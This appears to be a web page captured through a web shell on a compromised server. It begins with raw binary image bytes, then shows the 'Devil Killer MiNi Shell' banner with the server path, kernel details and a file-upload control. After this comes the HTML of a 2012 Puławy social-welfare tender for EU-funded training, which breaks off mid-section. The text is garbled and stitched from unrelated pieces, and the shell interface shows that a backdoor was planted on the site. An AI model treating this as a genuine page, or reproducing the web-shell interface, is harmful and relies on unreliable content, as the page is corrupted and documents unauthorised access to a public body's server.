JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120314/78526-N-2012.html

<p class="kh_header"><b>Puławy: NI.3410-EFS-1/2012</b><br>
<b>Numer ogłoszenia: 78526 - 2012; data zamieszczenia: 14.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Leśna 17, 24-100 Puławy, woj. lubelskie, tel. 081 8868419, faks 081 8868420.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.pulawy.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mops.pulawy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NI.3410-EFS-1/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie:

Część I Treningu kompetencji i umiejętności społecznych w zakresie opracowania planu zmiany osobistej dla beneficjentów ostatecznych projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego.

Część II  Treningu kompetencji i umiejętności społecznych w zakresie radzenia sobie z obowiązkami życia codziennego i gospodarowania budżetem domowym dla beneficjentów ostatecznych projektu Aktywni- niezależni współfinansowanego z Europejskiego Funduszu Społecznego.

Część III Warsztatów aktywnego poszukiwania pracy dla beneficjentów ostatecznych projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego.

Część IV Indywidualnego doradztwa zawodowego dla beneficjentów ostatecznych projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 16.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczególnego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał lub wykonuje należycie: a) część I zamówienia co najmniej 3 szkolenia, którego zakres tematyczny zawiera minimalny zakres tematyczny opisany w przedmiocie zamówienia w dodatku nr 1; b) część II zamówienia co najmniej 3 szkolenia, którego zakres tematyczny zawiera minimalny zakres tematyczny opisany w przedmiocie zamówienia w dodatku nr 1; c)część III zamówienia co najmniej 3 szkolenia/ warsztaty, których zakres tematyczny zawiera minimalny zakres tematyczny opisany w przedmiocie zamówienia w dodatku nr 1;d) część IV zamówienia co najmniej 100 godzin dydaktycznych indywidualnego doradztwa zawodowego, których zakres tematyczny zawiera minimalny zakres tematyczny opisany w przedmiocie zamówienia w dodatku nr 1;         
2.Zamawiający oceni spełnienie tego warunku na podstawie dodatku nr 4 w zakresie każdej części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczególnego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował: a) część I zamówienia wykładowcami, trenerami (minimum dwoma) z co najmniej wykształceniem wyższym psychologicznym oraz uprawnieniami w zakresie psychoterapii, udokumentowanymi certyfikatem, zaświadczeniem lub dyplomem po ukończeniu kursu, szkoły lub studiów podyplomowych. Każda z tych osób będzie posiadać doświadczenie w przeprowadzeniu minimum 3 szkoleń,treningów o tematyce obejmującej wsparcie w zakresie podniesienia kompetencji osobistych i życiowych. W przypadku zmiany kadry podstawowej wykonawca zobowiązany jest zapewnić kadrę rezerwową co najmniej z wymaganiami wymienionymi wyżej; b) część II wykładowcami,trenerami (minimum dwoma) z co najmniej wykształceniem wyższym i uprawnieniami trenera umiejętności miękkich. Każda z tych osób będzie posiadać doświadczenie w przeprowadzeniu minimum 3 szkoleń,treningów o tematyce obejmującej wsparcie w zakresie radzenia sobie z obowiązkami życia codziennego  i gospodarowania budżetem. W przypadku zmiany kadry podstawowej wykonawca zobowiązany jest zapewnić kadrę rezerwową co najmniej z wymaganiami wymienionymi wyżej; c) część III. zamówienia doradcami zawodowymi ( minimum dwoma) z co najmniej wykształceniem wyższym kierunkowym w zakresie doradztwa zawodowego lub wykształceniem wyższym i studiami podyplomowymi w zakresie doradztwa zawodowego. Każda z tych osób będzie posiadać doświadczenie w przeprowadzeniu minimum 3 szkoleń, warsztatów z zakresu aktywnego poszukiwania pracy. W przypadku zmiany kadry podstawowej wykonawca zobowiązany jest zapewnić kadrę rezerwową co najmniej z wymaganiami wymienionymi wyżej; d) część IV zamówienia doradcami zawodowymi  ( minimum dwoma) z co najmniej wykształceniem wyższym kierunkowym w zakresie doradztwa zawodowego lub wykształceniem wyższym i studiami podyplomowymi w zakresie doradztwa zawodowego, który przeprowadził minimum100 godzin dydaktycznych z zakresu indywidualnego doradztwa zawodowego. W przypadku zmiany kadry podstawowej wykonawca zobowiązany jest zapewnić kadrę rezerwową co najmniej z wymaganiami wymienionymi wyżej. 
2.	 Zamawiający oceni spełnienie tego warunku na podstawie dodatku nr 5 i oświadczenia wykonawcy, że wszystkie osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (dodatek nr 6).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczególnego w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofert (dodatek nr 3); Wzór umowy ( dodatek nr 2); Szczegółowy program szkolenia (dodatek nr 8);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie wykonawcy w prowadzeniu tego typu szkoleń/doradztwa/warsztatów (w ciągu ostatnich trzech lat) - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) zmiany terminu rozpoczęcia lub zakończenia szkolenia wywołanej w szczególności nie skompletowaniem na czas pełnej grupy szkoleniowej lub z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia oraz wystąpienia zdarzeń losowych; b) zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań określonych w SIWZ. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ; c) zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Zamawiającego. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych; d) Zmiany ceny - cena jednostkowa będzie mogła ulec zmianie na skutek zmiany stawek podatkowych, dla przedmiotu zamówienia, wystąpienie o zmianę cen jednostkowych przez Wykonawcę musi odbyć się wyprzedzeniem, nie później niż 7 dni przed proponowaną datą zmiany ceny; e) Zmiany wprowadzone do umowy będą obowiązywały po podpisaniu odpowiedniego aneksu przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.mops.pulawy.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2012 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej ul. Leśna 17, 24-100 Puławy sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Program Operacyjny Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i Upowszechnianie Aktywnej Integracji, Poddziałanie 7.1.1 Rozwój i Upowszechnianie Aktywnej Integracji przez Ośrodki Pomocy Społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Treningu kompetencji i umiejętności społecznych w zakresie opracowania planu zmiany osobistej dla beneficjentów ostatecznych projektu Aktywni-niezależni  współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowana ilość osób kierowanych na szkolenie:
70 osób 
7 grup po 10 osób (zamawiający zastrzega możliwość zmniejszenia liczby uczestników maksymalnie o 5% czyli o 3 osoby)
Czas trwania szkolenia
280 godzin dydaktycznych czyli 40 godzin dydaktycznych na jedną grupę  (jedna godzina dydaktyczna = 45 minut) +2 przerwy kawowe i jedna przerwa na obiad.
Warunki organizacji czasu trwania zajęć
Zajęcia mogą być prowadzone w dni od poniedziałku do czwartku z wyjątkiem dni świątecznych i 02.05.2012r., 04.05.2012 r. i 08.06.2012 roku. Zajęcia mogą się rozpoczynać najwcześniej o godzinie 8:00, natomiast muszą się zakończyć najpóźniej o godzinie 15:00
Termin realizacji szkolenia
Rozpoczęcie najwcześniej 16.04.2012roku, zakończenie najpóźniej do 28.06.2012roku ( z wyłączeniem 02.05.2011, 04. 05. 2012 r. i 08.06.2012roku)
Miejsce realizacji szkolenia
Sala nr 11 w Miejskim Ośrodku Pomocy Społecznej  w Puławach ul. Leśna 17, 24-100 Puławy
Wymagany minimalny zakres tematyczny szkolenia
( minimalny program szkolenia)
trening postaw i komunikacji interpersonalnej
praca z wyuczona bezradnością 
radzenie sobie ze stresem i negatywnymi emocjami
zasady konstruowania celów życiowych
wypracowanie planu zmiany osobistej
Wymagane minimalne kwalifikacje kadry dydaktycznej, która będzie przeprowadzała szkolenie będące przedmiotem zamówienia
Minimum dwie osoby co najmniej z wykształceniem wyższym psychologicznym oraz uprawnieniami w zakresie psychoterapii udokumentowanymi certyfikatem, zaświadczeniem lub dyplomem po ukończeniu kursu, szkoły lub studiów podyplomowych  oraz każda z osobna posiadająca doświadczenie w prowadzeniu co najmniej 3 szkoleń, treningów o tematyce obejmującej wsparcie w zakresie, podniesienia kompetencji osobistych i życiowych.
Sposób sprawdzania efektów szkolenia.
Na początku i na koniec szkolenia zostaną przeprowadzone badania ewaluacyjne w zakresie oceny kompetencji i umiejętności społecznych uczestników.
W cenę powinno być wliczone:
ubezpieczenie uczestników na okres trwania szkolenia od następstw NW.
kadra, która posiada odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia.
materiały szkoleniowe z naniesionymi odpowiednio obowiązującymi logotypami dla każdego uczestnika i jednym egzemplarzem dla Zamawiającego:  
-	podręcznik Zyskaj na Kryzysie. Nudziarze Zawsze Przegrywają Apianus Peter, 
-	skrypt
-	notatnik, 
-	długopis, 
-	zakreślacz
codzienny serwis kawowy( kawa, herbata, cukier, śmietanka, zimne napoje, ciastka) oraz jeden gorący posiłek każdego dnia szkolenia( co najmniej drugie danie), dla wszystkich uczestników.
wydanie każdemu uczestnikowi zaświadczenia o  ukończeniu szkolenia, zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03.02.2006r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formie pozaszkolnej( Dz.U. z 2006r. Nr 31 poz.216), oznaczone logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (wzór logotypu dostępny u zamawiającego).
prowadzenie dokumentacji szkolenia ( m.in., listy obecności, listy odbioru materiałów szkoleniowych, dziennika zajęć, ankiety ewaluacyjne itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy w prowadzeniu tego typu szkoleń, doradztwa, warsztatów (w ciągu ostatnich trzech lat) - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trening kompetencji i umiejętności społecznych w zakresie radzenia sobie z obowiązkami życia codziennego i gospodarowania budżetem domowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowana ilość osób kierowanych na szkolenie:
20 osób 2 grupy po  10  osób.
(zamawiający zastrzega możliwość zmniejszenia liczby uczestników maksymalnie o 5% czyli o 
1 osobę)
Czas trwania szkolenia
48 godzin dydaktycznych czyli 24 godziny dydaktyczne na jedną grupę  (jedna godzina dydaktyczna = 45 minut) +2 przerwy kawowe i jedna przerwa na obiad.
Warunki organizacji czasu trwania zajęć
Zajęcia mogą być prowadzone w dni od poniedziałku do czwartku z wyjątkiem dni świątecznych.
Zajęcia mogą się rozpoczynać najwcześniej o godzinie 8:00, natomiast muszą się zakończyć najpóźniej o godzinie 15:00
Termin realizacji szkolenia
Rozpoczęcie najwcześniej 02.07.2012roku, zakończenie najpóźniej do 12.07.2012roku. 
Miejsce realizacji szkolenia
Sala nr 11 w Miejskim Ośrodku Pomocy Społecznej  w Puławach ul. Leśna 17, 24-100 Puławy
Wymagany minimalny zakres tematyczny szkolenia
( minimalny program szkolenia)
gospodarowanie budżetem domowym ( istota budżetu domowego, cel tworzenia budżetu  domowego, zarządzanie budżetem domowym, kontrola wydatków, efektywne oszczędzanie, deficyt budżetu domowego)
planowanie wydatków z wyprzedzeniem
radzenie sobie z obowiązkami życia codziennego (planowanie dnia, podział obowiązków)
Wymagane minimalne kwalifikacje kadry dydaktycznej, która będzie przeprowadzała szkolenie będące przedmiotem zamówienia
Minimum dwie osoby co najmniej z wykształceniem wyższym i uprawnieniami trenera umiejętności miękkich, każda z osobna posiadająca doświadczenie w prowadzeniu co najmniej 3 szkoleń,treningów o tematyce obejmującej wsparcie w zakresie radzenia sobie z obowiązkami życia codziennego i gospodarowania budżetem domowym.
Sposób sprawdzania efektów szkolenia.
Na początku i na koniec szkolenia zostaną przeprowadzone badania ewaluacyjne w zakresie oceny kompetencji i umiejętności społecznych uczestników.
W cenę powinno być wliczone:
ubezpieczenie uczestników na okres trwania szkolenia od następstw NW.
kadra, która posiada odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia.
materiały szkoleniowe z naniesionymi odpowiednio logotypami dla każdego uczestnika i jednym egzemplarzem dla Zamawiającego:  
-	Podręcznik Budżet domowy pod kontrolą. Jak rozsądnie wydawać, oszczędzać i inwestować pieniądze, Łabenda Krzysztof Piotr
-	skrypt
-	notatnik, 
-	długopis, 
-	zakreślacz
codzienny serwis kawowy( kawa, herbata, cukier, śmietanka, zimne napoje, ciastka) oraz jeden gorący posiłek każdego dnia szkolenia( co najmniej drugie danie), dla wszystkich uczestników.
wydanie każdemu uczestnikowi zaświadczenia o  ukończeniu szkolenia, zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03.02.2006r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formie pozaszkolnej( Dz.U. z 2006r. Nr 31 poz.216), oznaczone logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (wzór logotypu dostępny u zamawiającego).
prowadzenie dokumentacji szkolenia ( m.in., listy obecności, listy odbioru materiałów szkoleniowych, dziennika zajęć, ankiety ewaluacyjne itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy w prowadzeniu tego typu szkoleń, doradztwa, warsztatów (w ciągu ostatnich trzech lat) - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaty  aktywnego poszukiwania pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowana ilość osób kierowanych na szkolenie:
68 osób, 5 grup 
